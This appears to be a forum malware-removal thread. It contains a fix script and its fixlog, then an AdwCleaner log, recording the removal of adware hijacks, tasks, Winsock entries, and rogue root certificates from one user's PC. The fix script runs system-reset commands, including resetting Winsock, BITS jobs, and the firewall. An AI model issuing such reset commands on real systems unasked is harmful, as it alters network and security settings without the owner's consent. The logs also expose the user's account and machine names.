SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
SearchScopes: HKLM-x32 -> {5a1d0d31-749c-4186-a295-4106e6e7b26a} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^AFA^xdm318^YYA^us&si=7cq-b&ptb=BCFD409C-284D-4B07-9DD5-707EAD598BA7&ind=2013111513&n=77fda4d9&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {5a1d0d31-749c-4186-a295-4106e6e7b26a} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^AFA^xdm318^YYA^us&si=7cq-b&ptb=BCFD409C-284D-4B07-9DD5-707EAD598BA7&ind=2013111513&n=77fda4d9&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://nortonsafe.search.ask.com/web?q={SEARCHTERMS}&o=APN10506&l=dis&prt=NS&chn=oem&geo=US&ver=22&locale=en_US&gct=kwd&qsrc=2869
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {cf34d395-9ff1-49a0-98a5-8db1636431b1} URL = hxxp://houmpage.com/search/?src=ds&q={searchTerms}&ssid=1450481507&a=1024151&uuid=7e89bdc6-7099-4da4-a7cc-3fa3a69a6cef
Toolbar: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - No File
FF NewTab: hxxp://www-searching.com/?site=shyosffdefault&prd=set_ff&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,
FF Plugin-x32: @CouponXplorer_5z.com/Plugin -> C:\Program Files (x86)\CouponXplorer_5z\bar\1.bin\NP5zStub.dll [2013-11-15] (MindSpark)
FF Plugin HKU\S-1-5-21-1018505005-2824899964-3694806622-1001: tdameritrade.com/thinkorswim -> C:\Program Files (x86)\thinkorswim\npthinkorswim.dll [No File]
FF Plugin HKU\S-1-5-21-1018505005-2824899964-3694806622-1001: tdameritrade.com/tossc -> C:\Program Files (x86)\thinkorswim\nptossc.dll [No File]
FF user.js: detected! => C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\user.js [2015-12-18]
CHR HomePage: Default -> hxxp://www-searching.com/?pid=s&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,&vp=ch&prd=set_ch
CHR StartupUrls: Default -> "hxxp://www-searching.com/?pid=s&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,&vp=ch&prd=set_ch"
S2 EraserSvc11511; "C:\Program Files (x86)\Norton Security\Engine\22.5.4.24\NS.exe" /h ccCommon [X]
Task: {0233CBA7-CF8D-47C8-AAE0-15C5520BF73A} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {37FDB4B4-6F58-489C-8711-7C16755A4F51} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {49AB09C4-19DF-4844-B998-467FA3B28176} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {52A76F52-D07F-4BA4-BBA5-AEFB8BDDE6A6} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {8320D12B-9A3D-426A-BE5D-C9473998057E} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {8ED39B48-87B2-45B8-9B4A-7E3A4A3DEF49} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {926DF571-83F8-4B67-B099-E0CDE2A8E9B0} - \DNSKALAMAZOO -> No File <==== ATTENTION
Task: {96B45D1F-D133-4A3A-95CD-6BF63DBC0718} - System32\Tasks\Digital Sites => C:\Users\LEVILA~1\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: {9D71B00E-3092-4BC0-8F6B-D6DA41E8DC2F} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {B0286D41-AF85-4532-AD16-2B5402FE5DE7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {DD03D11B-03BD-4AD8-A57F-49D7F5FBD8A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {F4362C16-5DD8-45CC-BFF8-0DE20551FD7B} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {FC1EC4B9-E68E-48D4-B596-73DA09BA7009} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\Digital Sites.job => C:\Users\LEVILA~1\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Reprise:vnhwfkolvwxicefnplfh [0]
Winsock: Catalog9-x64 01 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 02 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 03 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 04 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 05 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
CMD: netsh winsock reset catalog
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
Emptytemp:
End
*****************

Restore point was successfully created.
Processes closed successfully.
C:\Program Files\Phrase Professor191220150009\MolacAgafxi.exe => No running process found
"C:\Program Files\Phrase Professor191220150009" => not found.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{45A8F68D-05A0-4573-8D3D-72E45371DEB8} => key not found.
HKCR\CLSID\{45A8F68D-05A0-4573-8D3D-72E45371DEB8} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{45A8F68D-05A0-4573-8D3D-72E45371DEB8} => key not found.
HKCR\Wow6432Node\CLSID\{45A8F68D-05A0-4573-8D3D-72E45371DEB8} => key not found.
HKLM\Software\Mozilla\Firefox\Extensions\\{45A8F68D-05A0-4573-8D3D-72E45371DEB8} => value removed successfully
C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi => not found.
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{45A8F68D-05A0-4573-8D3D-72E45371DEB8} => value removed successfully
OhufgaFyfves => service not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Price Finder => value removed successfully
C:\Program Files (x86)\Price Finder => moved successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ShopAtHomeWatcher => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ShopAtHomeUpdater => value removed successfully
C:\Users\levilaing\AppData\Roaming\ShopAtHome => moved successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => key removed successfully
HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{5a1d0d31-749c-4186-a295-4106e6e7b26a}" => key removed successfully
HKCR\Wow6432Node\CLSID\{5a1d0d31-749c-4186-a295-4106e6e7b26a} => key not found.
"HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{5a1d0d31-749c-4186-a295-4106e6e7b26a}" => key removed successfully
HKCR\CLSID\{5a1d0d31-749c-4186-a295-4106e6e7b26a} => key not found.
"HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}" => key removed successfully
HKCR\CLSID\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} => key not found.
"HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{cf34d395-9ff1-49a0-98a5-8db1636431b1}" => key removed successfully
HKCR\CLSID\{cf34d395-9ff1-49a0-98a5-8db1636431b1} => key not found.
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} => value removed successfully
HKCR\CLSID\{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} => key not found.
Firefox "newtab" removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@CouponXplorer_5z.com/Plugin" => key removed successfully
C:\Program Files (x86)\CouponXplorer_5z\bar\1.bin\NP5zStub.dll => moved successfully
"HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\Software\MozillaPlugins\tdameritrade.com/thinkorswim" => key removed successfully
C:\Program Files (x86)\thinkorswim\npthinkorswim.dll => not found.
"HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\Software\MozillaPlugins\tdameritrade.com/tossc" => key removed successfully
C:\Program Files (x86)\thinkorswim\nptossc.dll => not found.
C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\user.js => moved successfully
Chrome HomePage => removed successfully
Chrome StartupUrls => removed successfully
EraserSvc11511 => service could not remove
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0233CBA7-CF8D-47C8-AAE0-15C5520BF73A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0233CBA7-CF8D-47C8-AAE0-15C5520BF73A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{37FDB4B4-6F58-489C-8711-7C16755A4F51}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37FDB4B4-6F58-489C-8711-7C16755A4F51}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{49AB09C4-19DF-4844-B998-467FA3B28176}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{49AB09C4-19DF-4844-B998-467FA3B28176}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{52A76F52-D07F-4BA4-BBA5-AEFB8BDDE6A6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{52A76F52-D07F-4BA4-BBA5-AEFB8BDDE6A6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8320D12B-9A3D-426A-BE5D-C9473998057E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8320D12B-9A3D-426A-BE5D-C9473998057E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8ED39B48-87B2-45B8-9B4A-7E3A4A3DEF49}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8ED39B48-87B2-45B8-9B4A-7E3A4A3DEF49}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{926DF571-83F8-4B67-B099-E0CDE2A8E9B0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{926DF571-83F8-4B67-B099-E0CDE2A8E9B0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DNSKALAMAZOO" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{96B45D1F-D133-4A3A-95CD-6BF63DBC0718}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{96B45D1F-D133-4A3A-95CD-6BF63DBC0718}" => key removed successfully
C:\WINDOWS\System32\Tasks\Digital Sites => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Digital Sites" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9D71B00E-3092-4BC0-8F6B-D6DA41E8DC2F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9D71B00E-3092-4BC0-8F6B-D6DA41E8DC2F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B0286D41-AF85-4532-AD16-2B5402FE5DE7}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B0286D41-AF85-4532-AD16-2B5402FE5DE7}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{DD03D11B-03BD-4AD8-A57F-49D7F5FBD8A9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DD03D11B-03BD-4AD8-A57F-49D7F5FBD8A9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F4362C16-5DD8-45CC-BFF8-0DE20551FD7B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F4362C16-5DD8-45CC-BFF8-0DE20551FD7B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FC1EC4B9-E68E-48D4-B596-73DA09BA7009}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FC1EC4B9-E68E-48D4-B596-73DA09BA7009}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
C:\WINDOWS\Tasks\Digital Sites.job => moved successfully
C:\ProgramData\Reprise => ":vnhwfkolvwxicefnplfh" ADS removed successfully.
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000001" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000002" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000003" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000004" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000005" => key removed successfully

=========  netsh winsock reset catalog =========

Initialization Function InitHelperDll in NSHHTTP.DLL failed to start with error code 10107

Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.


========= End of CMD: =========


=========  bitsadmin /reset /allusers =========


BITSADMIN version 3.0 [ 7.8.10586 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Unable to cancel {9B63404F-FC28-40BD-A05D-BFB19AC65C62}.
{F2D8D534-10B8-407B-B521-A1DDAF9D450E} canceled.
{B514FA58-D29F-4EDC-8EC3-DD5DB6C2F872} canceled.
{BBDBC22C-DEF8-43AB-92EA-13ED16FE8AD7} canceled.
{29D36EC1-3C67-4CEF-BC34-0D0B45E25FE2} canceled.
4 out of 5 jobs canceled.

========= End of CMD: =========


=========  netsh advfirewall reset =========

Ok.


========= End of CMD: =========


=========  netsh advfirewall set allprofiles state on =========

Ok.


========= End of CMD: =========


=========  ipconfig /flushdns =========


Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========

EmptyTemp: => 91.5 MB temporary data Removed.


The system needed a reboot.

==== End of Fixlog 16:45:35 ====


#7
LLL31

  • Topic Starter
  • Member
  • 15 posts

# AdwCleaner v5.101 - Logfile created 09/03/2016 at 17:33:35
# Updated 07/03/2016 by Xplode
# Database : 2016-03-08.1 [Server]
# Operating system : Windows 10 Home  (x64)
# Username : levilaing - LEVISPC
# Running from : C:\Users\levilaing\Downloads\adwcleaner_5.101.exe
# Option : Clean
# Support : http://toolslib.net/forum

***** [ Services ] *****

[-] Service Deleted : bsdriver
[-] Service Deleted : cherimoya

***** [ Folders ] *****

[-] Folder Deleted : C:\Program Files (x86)\CouponXplorer_5z
[-] Folder Deleted : C:\Program Files (x86)\CouponXplorer_5zEI
[-] Folder Deleted : C:\Program Files (x86)\dply_en_015020180
[J] Folder Not Deleted : C:\Program Files (x86)\dply_en_015020180
[-] Folder Deleted : C:\ProgramData\1e908d04-21f7-0
[-] Folder Deleted : C:\ProgramData\1e908d04-5b25-1
[-] Folder Deleted : C:\ProgramData\67322837
[-] Folder Deleted : C:\ProgramData\e16f6b56-0817-0
[-] Folder Deleted : C:\ProgramData\e16f6b56-53e7-0
[-] Folder Deleted : C:\ProgramData\{09b42448-312c-0}
[-] Folder Deleted : C:\ProgramData\{0b294307-012c-1}
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DESKTOPPLAY
[-] Folder Deleted : C:\Users\levilaing\AppData\Local\BrowserAir
[-] Folder Deleted : C:\Users\levilaing\AppData\Local\iac
[-] Folder Deleted : C:\Users\levilaing\AppData\Local\CouponXplorer_5z
[-] Folder Deleted : C:\Users\levilaing\AppData\Local\dply_en_015020180
[J] Folder Not Deleted : C:\Users\levilaing\AppData\Local\dply_en_015020180
[-] Folder Deleted : C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\bopakagnckmlgajfccecajhnimjiiedh
[-] Folder Deleted : C:\Users\levilaing\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
[-] Folder Deleted : C:\Users\levilaing\AppData\LocalLow\iac
[-] Folder Deleted : C:\Users\levilaing\AppData\LocalLow\ShopAtHome
[-] Folder Deleted : C:\Users\levilaing\AppData\LocalLow\CouponXplorer_5z
[-] Folder Deleted : C:\Users\levilaing\AppData\LocalLow\CouponXplorer_5zEI
[-] Folder Deleted : C:\Users\levilaing\AppData\Roaming\DigitalSites

***** [ Files ] *****

[-] File Deleted : C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\yahoo_ff.xml
[-] File Deleted : C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\smod.xml
[#] File Deleted : C:\WINDOWS\SysNative\drivers\bsdriver.sys
[#] File Deleted : C:\WINDOWS\SysNative\drivers\cherimoya.sys

***** [ DLLs ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****

[-] Task Deleted : {7E7E0F47-097E-080A-0911-0E7E057A117A}
[-] Task Deleted : {D1996BD7-8FB6-7614-566B-6FE1DB83922B}

***** [ Registry ] *****

[-] Key Deleted : HKLM\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\A7BD54B233B5B2F70AF86F5BD1A0C0A772A59FC6
[-] Key Deleted : HKLM\SOFTWARE\MICROSOFT\SystemCertificates\Root\Certificates\D830B6B8939ACB4928401060203BB648456BB4F8
[-] Key Deleted : HKLM\SOFTWARE\MICROSOFT\SystemCertificates\Root\Certificates\F53E693DDABF57A88A9B12B608B09B26C0608B74
[-] Key Deleted : HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{67322837}
[-] Key Deleted : HKCU\Software\Google\Chrome\Extensions\jlcgehabolcakkjhgmgpkagpolbjlhfa
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{425F4ABF-B8E4-402D-9E49-06E494EB8DBF}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{13119113-0854-469D-807A-171568457991}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1663C10B-0D55-438D-8496-19A3DBAEC0E4}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{33119133-0854-469D-807A-171568457991}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6E993643-8FBC-44FE-BC85-D318495C4D96}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A43DE495-3D00-47D4-9D2C-303115707939}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D40753C7-8A59-4C1F-BE88-C300F4624D5B}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{40A61B9E-B111-46EE-A1F2-C1100192BA48}
[#] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{13119113-0854-469d-807A-171568457991}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{131a1f72-5c50-43cf-ba3e-3ac75df1188b}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{2238806b-78fe-443b-84c0-3c3d7647b8b8}
[#] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{33119133-0854-469d-807A-171568457991}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{48708b86-3672-46f9-89cf-680f8e807b91}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{4ad0f9ab-db53-49fa-9c03-42e6ae1f0c7c}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{5bb649a4-1c05-4e18-b7a0-80a0fd29d8d7}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{60727c6e-2fcb-4562-8685-7c59f5ea0c16}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{627d42c1-e006-4bf2-bb79-d5fc6e0e01f0}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{746c749a-528c-4e31-bc96-848c0d909fb4}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{76e9f00f-6852-44fc-b406-bb452f232a1b}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{927c6290-8b1f-4673-9046-658843fea0d0}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{ae1fb1ef-c142-48d2-8bfa-2730b43e8bea}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{b1c38f5a-506f-4f75-80d7-292903e8f87a}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{b32e7dc1-4d99-4480-844a-06c15df31ed4}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{b4fa9c4c-95e4-4f97-ae11-53d374520b46}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{ba1ab335-e597-40cf-a2b7-c28c27e10672}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{23119123-0854-469D-807A-171568457991}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{004F2608-3092-40C2-B880-1FD74DDA6B9A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{0CD246B5-EC5A-4601-9A8F-C6D21742BB86}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{15F335C1-5CC0-4786-ABB9-06E727FF2D42}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{1B4CF49B-8B69-4A90-8B51-D2088E1EC1BA}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{1B749406-A17C-4A1C-9E87-E1E94A0C1A52}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{1BCF3F83-F9A0-4075-B0BC-53128BBC228F}
[#] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{23119123-0854-469D-807A-171568457991}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{23905799-4E4E-457F-8EEA-88A514D38DCA}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{2EEF77F9-4F97-4158-9209-A95B38C38EC1}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4025F9A4-91CE-4F20-8486-8A3D95564DB3}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{41040243-9338-4C91-9457-AD11F56F48E1}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4B6F98D4-3D4D-4D72-A89B-7B75207AF16D}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4E60D532-F00E-495B-BD0F-75F1B96CC714}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{5128A486-0AED-4F8D-B1C0-1E0FF64CD1D0}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{03119103-0854-469D-807A-171568457991}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{76481128-CCDC-4073-8F65-B06F23B138FC}
[#] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{03119103-0854-469D-807A-171568457991}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{3852AB8E-1CA9-4B29-846F-092CA8D97969}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{4132189A-73C7-4D3E-A8C2-82EF57842DAC}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{697FA9F6-DA51-4F3C-8F01-FD5DAAFC18E5}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{787ED5A2-18E3-49F2-BCFA-8E2344087D50}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{8221AC18-699F-46C9-8A89-0916CBDB5005}
